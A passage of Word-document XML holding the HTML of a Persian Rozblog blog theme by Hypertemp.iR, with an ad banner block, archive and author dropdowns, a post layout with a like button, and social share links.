    <w:p w14:paraId="5EC44EC1" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Pms End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0E2120" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="35198864" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;!--Hypertemp.iR Ads Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F922DE9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="ads-120"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F8055C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Custom_Option_Block=5&gt;&lt;RB:Custom_Option_Title&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>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/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> بنر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بالا سمت چپ</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/RB:Custom_Option_Title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F2595C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Custom_Option_Content&gt;&lt;a href="http://www.hypertemp.ir/page/ads"target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>محل 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/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> شما</w:t>
      </w:r>
      <w:r>
        <w:t>" rel=""&gt;&lt;img src="http://up.hypertemp.ir/view/2589449/2wip58gqe19narycuwef.gif" alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>محل 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/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> شما</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">" rel=""&gt;&lt;/a&gt;&lt;!---- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>تا 95/10/09</w:t>
      </w:r>
      <w:r>
        <w:t>----&gt;&lt;a href="http://www.hypertemp.ir/page/ads"target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>محل 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/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> شما</w:t>
      </w:r>
      <w:r>
        <w:t>" rel=""&gt;&lt;img src="http://up.hypertemp.ir/view/2589449/2wip58gqe19narycuwef.gif" alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>محل 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/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> شما</w:t>
      </w:r>
      <w:r>
        <w:t>" rel=""&gt;&lt;/a&gt;&lt;a href="http://www.hypertemp.ir/page/ads"target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>محل 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/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> شما</w:t>
      </w:r>
      <w:r>
        <w:t>" rel=""&gt;&lt;img src="http://up.hypertemp.ir/view/2589449/2wip58gqe19narycuwef.gif" alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>محل 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/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> شما</w:t>
      </w:r>
      <w:r>
        <w:t>" rel=""&gt;&lt;/a&gt;&lt;/RB:Custom_Option_Content&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5B0E70" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Custom_Option_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1245CDBC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF26045" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Ads End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F63E8AB" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="16E1CB67" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F44FBBE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Pms &amp; ads End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447A933F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="2D6FAF08" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Title Asli Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309A82E6" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="title-asli"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329C85DA" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;i class="fa fa-inbox"&gt;&lt;/i&gt;&lt;h3&gt;[RB:Blog_And_Post_Title]&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C7BCEF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="3EA7F444" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Archive Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C52AD91" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Blog_Archive_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD97DDA" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;select&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BDD66F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;option&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>انتخاب سال انتشار</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D829AE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Blog_Archive_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC3CB61" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;option onclick="location.href='[Archive_Link]'"&gt;[Archive_Title]&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5E39E7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Blog_Archive_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE041E2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/select&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594C7BC1" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Blog_Archive_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6634704E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;!--Hypertemp.iR Archive End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C54E56" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="205ADF3C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Authors Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5932B7CB" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Blog_Authors_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C1CD07" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;select&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE336B2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;option&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>انتخاب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سنده</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> مطلب</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B62A80" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Blog_Authors_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C893043" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;option onclick="location.href='[Author_Link]'"&gt;[Author_Name]&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460D6A48" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Blog_Authors_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB3343C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/select&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E7A0BC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Blog_Authors_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750E3C50" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Authors End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2CB82E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="54A2A4EF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9E580F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Title Asli End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA54597" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="2E6B7B5D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Post Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C685987" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;ROZBLOG&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3F7977" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;article class="post"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7023B9F2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="[Post_Link]" title="[Post_Title]" target="_blank" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A17286" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Post_Hit_Block&gt;&lt;span class="view"&gt;&lt;i class="fa fa-eye"&gt;&lt;/i&gt; [Post_Hit]&lt;/span&gt;&lt;/RB:Post_Hit_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB35107" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Post_Image&gt;&lt;img src="[Post_Image_Url]" alt="[Post_Title]" class="photo"&gt;&lt;/RB:Post_Image&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233844EC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="bg-pic"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B8E13C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA589ED" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="entery"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA8F561" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="right-side"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DA717D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="title"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F40ADCA" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="icon"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F57EF01" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;RB:Post_Rate_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B78E449" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="rate"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DAA627" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div id="rate_[PostId]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A24F3B8" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="javascript:void(0)" onclick="Rate([PostId],1,2)" id="like_a" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>مي پسندم</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : [Post_Rate_Total]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A6B39C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;i class="fa fa-heart ico-rest3"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34453260" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;span class="like_1" id="like_[PostId]"&gt;[Post_Rate_Total]&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAA6A62" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC025D0" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="javascript:void(0)" onclick="Rate([PostId],2,2)" id="like_b" style="display:none"&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F779232" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;span class="like_2" id="lik_[PostId]" style="display:none"&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29308F43" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F4C3FF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370FF27E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Post_Rate_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D691FA" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;h2&gt;&lt;a href="[Post_Link]" title="[Post_Title]" target="_blank" rel="bookmark"&gt;[Post_Title]&lt;/a&gt;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AB2B97" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB41ECA" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="matn rightheme-post-y"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650E0A8A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>[Post_Content]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B74432" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC019DE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="info"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AD1C1D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="inf"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371C3C6F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">&lt;R:B:Post_Author_Bliock&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>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سنده</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:س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سع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مراد</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &lt;/_R:B:Post_Author_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51473521" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Post_Date_Block&gt;&lt;i class="fa fa-calendar"&gt;&lt;/i&gt;&lt;span&gt;[Post_Date]&lt;/span&gt;&lt;/RB:Post_Date_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CE25C8" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Post_Cat_Block&gt;&lt;i class="fa fa-list-ul"&gt;&lt;/i&gt;&lt;RB:Post_Cat_Loop&gt;&lt;a href="[Post_Cat_Url]" rel="tag category"&gt;[Post_Cat_Title]&lt;/a&gt; &lt;/RB:Post_Cat_Loop&gt;&lt;/RB:Post_Cat_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068C27A0" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D8E0EB" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Post_More_Block&gt;&lt;a href="[Post_Link]" title="[Post_Title]" rel="bookmark" target="_blank" class="more"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ادامه مطلب</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;&lt;/RB:Post_More_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20396F44" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566E39A7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA68D1D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="share"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59807C62" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;a href="http://www.facebook.com/share.php?u=[Post_Link]&amp;t=[Post_Title]" target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>اشتراک گذار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سبوک</w:t>
      </w:r>
      <w:r>
        <w:t>" class="facebook link"&gt;&lt;i class="fa fa-facebook"&gt;&lt;/i&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31309631" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="http://twitter.com/home?status=[Post_Link]" target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>اشتراک گذار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تو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تر</w:t>
      </w:r>
      <w:r>
        <w:t>" class="twiter link"&gt;&lt;i class="fa fa-twitter"&gt;&lt;/i&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFEA06E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="https://plus.google.com/share?url=[Post_Link]" target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>اشتراک گذار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گوگل پلاس</w:t>
      </w:r>
      <w:r>
        <w:t>" class="googleplus link"&gt;&lt;i class="fa fa-google-plus"&gt;&lt;/i&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565D7281" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="https://telegram.me/share/url?text=cheack+this+site+please&amp;url=[Post_Link]" target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>اشتراک گذار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تلگرام</w:t>
      </w:r>
      <w:r>
        <w:t>" class="telegram link"&gt;&lt;i class="fa fa-paper-plane"&gt;&lt;/i&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FE90D5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160730A5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE1E7AF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/article&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7181F1D3" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/ROZBLOG&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21270FE9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Post End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729A129E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="1BC92159" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Pages Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E11272E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Blog_Page_Block&gt;</w:t>
      </w:r>
    </w:p>
